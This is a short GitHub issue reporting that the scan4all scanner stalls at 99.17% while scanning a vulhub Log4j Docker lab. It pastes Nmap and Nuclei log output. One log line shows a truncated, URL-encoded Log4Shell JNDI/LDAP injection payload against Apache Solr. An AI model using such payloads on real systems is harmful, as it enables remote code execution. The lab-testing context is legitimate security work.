Asynchronous go PoCs detection task %99.17 卡在99.17%
githublihaha opened this issue · 1 comments
Nmap done: 1 IP address (1 host up) scanned in 0.02 seconds
[INF] Port scan over,web scan starting
[WRN] Found 1 templates with syntax error (use -validate flag for further examination)
[INF] Using Nuclei Engine 2.7.5
[INF] Using Nuclei Templates
[INF] Templates added in last update: 0
[INF] Templates loaded for scan: 57
[WRN] Found 2 templates with syntax error (use -validate flag for further examination)
[INF] Using Nuclei Engine 2.7.5
[INF] Using Nuclei Templates
[INF] Templates added in last update: 0
[INF] Templates loaded for scan: 2160
[INF] Templates clustered: 107 (Reduced 97 HTTP Requests)
[INF] Using Interactsh Server: ....
[INF] Using Interactsh Server:
[2022-09-07 14:18:09] [solr-exposure] [http] [medium] [8.11.0]
[2022-09-07 14:18:13] [apache-solr-log4j-rce] [http] [critical]$%7Bjndi:ldap://$ [a111f4a5c687]
[INF] No results found. Better luck next time!..
Asynchronous go PoCs detection task %99.17 ....
就卡在这个 99.17%
是在使用scan4all扫描 vulhub的log4j的docker环境,的时候产生的。